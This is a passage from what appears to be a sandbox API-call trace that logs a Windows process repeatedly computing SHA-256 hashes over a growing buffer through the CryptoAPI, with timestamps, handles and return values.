(in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87870 [0187.642] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32e87870, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87870, pdwDataLen=0xce51c) returned 1 [0187.642] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.642] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.642] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.642] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.643] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x440, dwFlags=0x0) returned 1 [0187.643] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.643] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878a0 [0187.643] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e878a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e878a0, pdwDataLen=0xce51c) returned 1 [0187.643] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0187.643] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.643] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0187.643] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.643] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x460, dwFlags=0x0) returned 1 [0187.643] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.643] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88200 [0187.643] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e88200, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88200, pdwDataLen=0xce51c) returned 1 [0187.643] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.643] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0187.643] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.644] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.644] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0x480, dwFlags=0x0) returned 1 [0187.644] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ff0 [0187.644] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e87ff0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87ff0, pdwDataLen=0xce51c) returned 1 [0187.644] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.644] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.644] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0187.645] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.645] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0187.645] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87de0 [0187.645] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e87de0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87de0, pdwDataLen=0xce51c) returned 1 [0187.645] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.645] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0187.645] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.645] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.645] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0187.645] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.645] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e876c0 [0187.645] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e876c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e876c0, pdwDataLen=0xce51c) returned 1 [0187.645] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.645] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.645] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0187.646] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.646] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0187.646] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87930 [0187.646] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e87930, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87930, pdwDataLen=0xce51c) returned 1 [0187.646] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.646] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0187.646] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.647] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.647] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x500, dwFlags=0x0) returned 1 [0187.647] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e876f0 [0187.647] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e876f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e876f0, pdwDataLen=0xce51c) returned 1 [0187.647] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.647] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.647] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.647] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.647] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x520, dwFlags=0x0) returned 1 [0187.647] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a80 [0187.648] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e87a80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87a80, pdwDataLen=0xce51c) returned 1 [0187.648] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.648] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.648] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.648] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.648] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x540, dwFlags=0x0) returned 1 [0187.648] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e40 [0187.648] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e87e40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87e40, pdwDataLen=0xce51c) returned 1 [0187.648] CryptDestroyHash (hHash=0x3396f430) returned 1 [0187.648] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.648] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.649] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.649] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x560, dwFlags=0x0) returned 1 [0187.649] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.649] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87960 [0187.649] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e87960, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87960, pdwDataLen=0xce51c) returned 1 [0187.649] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.649] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.649] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.650] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.650] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x580, dwFlags=0x0) returned 1 [0187.650] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.650] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.650] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e87b40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87b40, pdwDataLen=0xce51c) returned 1 [0187.650] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0187.650] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.650] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.650] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.650] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0187.650] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.650] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b70 [0187.651] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e87b70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87b70, pdwDataLen=0xce51c) returned 1 [0187.651] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.651] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.651] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.651] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.651] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0187.651] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.651] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.651] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e87ba0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87ba0, pdwDataLen=0xce51c) returned 1 [0187.651] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.651] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.651] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.652] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.652] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0187.652] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.652] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87bd0 [0187.652] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e87bd0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87bd0, pdwDataLen=0xce51c) returned 1 [0187.652] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.652] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.652] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0187.652] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.652] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x600, dwFlags=0x0) returned 1 [0187.652] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.653] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c00 [0187.653] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e87c00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87c00, pdwDataLen=0xce51c) returned 1 [0187.653] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.653] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0187.653] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.658] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.658] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x620, dwFlags=0x0) returned 1 [0187.658] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c90 [0187.658] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e87c90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87c90, pdwDataLen=0xce51c) returned 1 [0187.658] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0187.658] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.658] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.658] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.659] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x640, dwFlags=0x0) returned 1 [0187.659] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d50 [0187.659] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e87d50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87d50, pdwDataLen=0xce51c) returned 1 [0187.659] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.659] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.659] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.659] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.659] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x660, dwFlags=0x0) returned 1 [0187.660] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d80 [0187.660] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e87d80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87d80, pdwDataLen=0xce51c) returned 1 [0187.660] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.660] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.660] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.660] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.660] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x680, dwFlags=0x0) returned 1 [0187.660] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f30 [0187.660] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e87f30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87f30, pdwDataLen=0xce51c) returned 1 [0187.660] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.660] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.660] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.661] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.661] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0187.661] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.661] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e87f60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87f60, pdwDataLen=0xce51c) returned 1 [0187.661] CryptDestroyHash (hHash=0x3396f890) returned 1 [0187.661] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.661] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.662] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.662] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0187.662] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f90 [0187.662] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e87f90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87f90, pdwDataLen=0xce51c) returned 1 [0187.662] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.662] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.662] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0187.663] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.663] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0187.663] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.663] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87fc0 [0187.663] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e87fc0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87fc0, pdwDataLen=0xce51c) returned 1 [0187.663] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.663] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0187.663] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0187.663] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.663] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x700, dwFlags=0x0) returned 1 [0187.663] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.663] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88020 [0187.663] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e88020, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88020, pdwDataLen=0xce51c) returned 1 [0187.663] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.663] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.663] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.664] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.664] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x720, dwFlags=0x0) returned 1 [0187.664] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e887d0 [0187.664] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e887d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e887d0, pdwDataLen=0xce51c) returned 1 [0187.664] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.664] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.664] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0187.665] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.665] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x740, dwFlags=0x0) returned 1 [0187.665] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e886e0 [0187.665] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32e886e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e886e0, pdwDataLen=0xce51c) returned 1 [0187.665] CryptDestroyHash (hHash=0x3396f190) returned 1 [0187.665] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0187.665] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.666] CryptCreateHash (in: hProv=0x338225d0, 